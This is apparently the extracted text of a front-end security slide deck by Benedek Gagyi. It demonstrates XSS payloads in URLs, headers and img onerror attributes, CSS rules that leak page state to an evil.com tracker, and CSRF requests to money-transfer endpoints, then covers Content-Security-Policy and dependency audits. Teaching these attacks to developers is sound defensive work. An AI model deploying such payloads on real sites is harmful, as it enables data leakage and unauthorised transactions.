Benedek Gagyi
Web dev.
@BenedekGagyi
Malicious script
Site containing malicious script
https://www.mybank.com?name=<script>alert(1)</script>
URL containing malicious script
Site containing malicious script
Request made using malicious URL
<div><script title="</div>">
<div>
<script title="</div>">
</script>
</div>
<script><div title="</script>"
<script>
<div title="
</script>
"
background-image:
url(https://www.evil-site.com/track)
.two-factor-checkbox:checked {
background-image:
url(https://www.evil.com/track?no2fa=true);
}
.security-tips-link:visited {
background-image:
url(https://www.evil.com/track?uneducated=true);
}
.meeting-location[value="SPY HEADQUARTERS"] {
background-image:
url(https://www.evil.com/track?loc=SpyHeadquarters);
}
<html>
</html>
Malicious link
<a href="...
html {
background-image:
url(/sendMoney?
amount=100&
to=123);
}
<a
href="
/sendMoney?
amount=100&
to=123
"
>
</a>
<form
action="
/sendMoney?
amount=100&
to=123
"
>
<button>Click me for free pizza</button>
</form>
<img
src="invalid.address"
onerror="alert(':P')"
/>
<img src="https://bank.com/
send_money?
amount=9999&
to=1231234143"
/>
True-Client-IP: <script>alert(":P")</script>
User-Agent: <script>alert(":P")</script>
script-src
style-src
img-src
...
www.content-security-policy.com
'none'
'self'
domain.example.com
https:
data:
*
'unsafe-inline'
...
Content-Security-Policy-Report-Only
report-uri / report-to
npm/yarn audit
snyk
aquasec
npq
By Benedek Gagyi
Security for front-end developers. Deck aimed for 1h (45 min) presentation.